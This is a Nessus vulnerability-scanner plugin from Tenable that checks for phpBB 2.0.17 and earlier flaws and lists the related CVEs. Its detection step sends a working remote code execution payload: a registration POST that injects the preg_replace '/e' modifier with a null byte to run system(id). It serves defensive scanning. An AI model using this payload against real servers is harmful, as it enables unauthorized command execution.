The remote host is running a version of phpBB that, if using PHP 5 with ‘register_globals’ enabled, fails to properly deregister global variables as well as failing to initialize several variables in various scripts. An attacker may be able to exploit these issues to execute arbitrary code or to conduct SQL injection and cross-site scripting attacks.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(20132);
script_version("1.32");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id(
"CVE-2005-3415",
"CVE-2005-3416",
"CVE-2005-3417",
"CVE-2005-3418",
"CVE-2005-3419",
"CVE-2005-3420",
"CVE-2005-3536",
"CVE-2005-3537"
);
script_bugtraq_id(15243, 15246);
script_name(english:"phpBB <= 2.0.17 Multiple Vulnerabilities");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple vulnerabilities.");
script_set_attribute(attribute:"description", value:
"The remote host is running a version of phpBB that, if using PHP 5
with 'register_globals' enabled, fails to properly deregister global
variables as well as failing to initialize several variables in various
scripts. An attacker may be able to exploit these issues to execute
arbitrary code or to conduct SQL injection and cross-site scripting
attacks.");
script_set_attribute(attribute:"see_also", value:"http://www.hardened-php.net/advisory_172005.75.html");
script_set_attribute(attribute:"see_also", value:"https://www.phpbb.com/community/viewtopic.php?f=14&t=336756");
script_set_attribute(attribute:"solution", value:
"Upgrade to phpBB version 2.0.18 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);
script_set_attribute(attribute:"vuln_publication_date", value:"2005/10/31");
script_set_attribute(attribute:"plugin_publication_date", value:"2005/11/02");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:phpbb_group:phpbb");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2005-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("phpbb_detect.nasl");
script_require_keys("www/phpBB");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);
# Test an install.
install = get_kb_item(string("www/", port, "/phpBB"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches)) {
ver = matches[1];
dir = matches[2];
# Check whether the profile.php script exists.
r = http_send_recv3(method: "GET", item:string(dir, "/profile.php?mode=register"), port:port);
if (isnull(r)) exit(0);
res = r[2];
# If it does...
if ('href="profile.php?mode=register&sid=' >< res) {
# Try to exploit some of the flaws to run a command.
exploit = "system(id)";
postdata = string(
"mode=register&",
"agreed=true&",
# nb: sets $error in "includes/usercp_register.php".
"language=1&",
# nb: causes array_merge() to fail in "common.php" w/ PHP5 so we avoid
# deregistering 'signature' and 'signature_bbcode_uid'.
"HTTP_SESSION_VARS=1&",
# nb: specifies our exploit.
"signature=:", exploit, "&",
# nb: injects the "e" modifier into preg_replace;
# the null-byte requires magic_quotes to be off.
"signature_bbcode_uid=(.*)/e%00"
);
r = http_send_recv3(method: "POST", port: port,
item: string(dir, "/profile.php?mode=register"),
content_type: "application/x-www-form-urlencoded",
data: postdata );
if (isnull(r)) exit(0);
res = r[2];
# There's a problem if we were able to run our command.
if (egrep(pattern:"root:.*:0:[01]:", string:res)) {
if (report_verbosity > 0) {
output = strstr(res, '<textarea name="signature"');
if (output) {
output = output - strstr(output, "</textarea>");
output = strstr(output, ">");
output = output - ">";
}
else
output = res;
output = data_protection::sanitize_uid(output:output);
security_hole(port:port, extra: output);
}
else
security_hole(port:port);
set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
exit(0);
}
}
# If we're being paranoid.
if (report_paranoia > 1) {
# Report if the version number <= 2.0.17 as the exploit might have failed.
if (ver =~ "([01]\.|2\.0\.([0-9]($|[^0-9])|1[0-7]))") {
security_hole(port:port, extra: "
***** Nessus has determined the vulnerability exists on the remote
***** host simply by looking at the version number of phpBB
***** installed there.
");
set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
exit(0);
}
}
}
Vendor | Product | Version | CPE |
---|---|---|---|
phpbb_group | phpbb | cpe:/a:phpbb_group:phpbb |
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3415
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3416
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3417
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3418
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3419
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3420
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3536
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3537
www.hardened-php.net/advisory_172005.75.html
www.phpbb.com/community/viewtopic.php?f=14&t=336756